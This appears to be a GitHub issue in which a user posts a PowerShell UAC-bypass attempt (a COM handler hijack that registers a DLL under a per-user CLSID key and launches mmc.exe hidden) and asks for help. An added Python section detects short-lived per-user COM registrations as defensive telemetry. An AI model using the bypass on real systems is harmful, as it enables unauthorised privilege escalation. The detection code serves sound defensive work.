COM handler hijack  #5

Open
@leosilberg


Hi there. I was wondering if you could give me any tips on making a powershell script for this UAC bypass. I've tried to copy the metasploit module but I've got nowhere.

```powershell
function ComBypass{
    param(
        [Parameter(Mandatory = $False)]
        [String]$dllFile
    )
    $rootKey="HKCU:\SOFTWARE\Classes\CLSID{0A29FF9E-7F9C-4437-8B11-F424491E3931}"
    $inproc_key = "$rootKey\InProcServer32"
    $shell_key = "$rootKey\ShellFolder"
    New-Item $rootKey -Force
    New-Item $inproc_key
    New-Item $shell_key
    New-ItemProperty -Path $inproc_key -Name "(Default)" -Value $dllFile
    New-ItemProperty -Path $inproc_key -Name 'ThreadingModel' -Value 'Apartment'
    New-ItemProperty -Path $inproc_key -Name 'LoadWithoutCOM' -Value ''
    New-ItemProperty -Path $shell_key -Name 'HideOnDesktop' -Value ''
    New-ItemProperty -Path $shell_key -Name 'Attributes' -PropertyType 'DWord' -Value 0xf090013d
    Start-Process -File cmd.exe -ArgumentList "/c mmc.exe CompMgmt.msc" -WindowStyle Hidden
    Start-Sleep -Seconds 10
    Remove-Item -Path $rootKey -Force -Recurse

}
ComBypass -dllFile "C:\cmd.dll"
```
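
For defenders, the pattern in the script above (a per-user `CLSID` server registration that is removed seconds later) is visible in registry-audit telemetry such as Sysmon registry events. The following is an added detection example, not part of the original issue or of the project; the event field names, the SID and the second CLSID are constructed assumptions.

```python
import re

# Per-user COM keys: HKCU\Software\Classes is backed by HKU\<SID>_Classes.
USER_CLSID = re.compile(
    r"^(?:HKCU\\Software\\Classes|HKU\\S-[\d-]+(?:_Classes|\\Software\\Classes))"
    r"\\CLSID\\(\{[0-9A-F-]{36}\})(?:\\(InProcServer32|LocalServer32)(?:\\(.*))?)?$",
    re.IGNORECASE,
)
TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")

def find_user_com_overrides(events, short_lived_secs=60):
    """Flag per-user COM server registrations and mark ones deleted soon after."""
    findings = {}
    for ev in sorted(events, key=lambda e: e["time"]):
        m = USER_CLSID.match(ev["target"])
        if not m:
            continue  # machine-wide (HKLM) or unrelated key
        clsid, server_key, value = m.group(1).upper(), m.group(2), m.group(3)
        if ev["type"] == "SetValue" and server_key and value == "(Default)":
            path = ev["details"].strip('"').lower()
            findings[clsid] = {
                "clsid": clsid, "server": ev["details"], "writer": ev["image"],
                "set_at": ev["time"], "short_lived": False,
                "untrusted_path": not path.startswith(TRUSTED_DIRS),
            }
        elif ev["type"] == "DeleteKey" and clsid in findings:
            f = findings[clsid]  # registration removed: was it within the window?
            f["short_lived"] = ev["time"] - f["set_at"] <= short_lived_secs
    return list(findings.values())

# Constructed sample events (field names and SID are assumptions, not real telemetry).
U = r"HKU\S-1-5-21-1111-2222-3333-1001_Classes\CLSID"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
PAGE_CLSID = "{0A29FF9E-7F9C-4437-8B11-F424491E3931}"  # CLSID from the post above
OTHER_CLSID = "{11111111-2222-3333-4444-555555555555}"  # constructed
SAMPLE_EVENTS = [
    {"time": 0, "type": "SetValue", "image": PS, "details": r"C:\cmd.dll",
     "target": U + "\\" + PAGE_CLSID + r"\InProcServer32\(Default)"},
    {"time": 0, "type": "SetValue", "image": PS, "details": "Apartment",
     "target": U + "\\" + PAGE_CLSID + r"\InProcServer32\ThreadingModel"},
    {"time": 5, "type": "SetValue", "image": r"C:\Windows\System32\msiexec.exe",
     "details": r"C:\Windows\System32\example.dll",
     "target": r"HKLM\SOFTWARE\Classes\CLSID" + "\\" + OTHER_CLSID + r"\InProcServer32\(Default)"},
    {"time": 11, "type": "DeleteKey", "image": PS, "details": "",
     "target": U + "\\" + PAGE_CLSID},
    {"time": 20, "type": "SetValue", "image": r"C:\Program Files\App\setup.exe",
     "details": r"C:\Program Files\App\shellext.dll",
     "target": U + "\\" + OTHER_CLSID + r"\InProcServer32\(Default)"},
]
```

A finding with both `untrusted_path` and `short_lived` set is the strongest signal; per-user registrations on their own also occur in legitimate per-user installs and need triage against a baseline.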
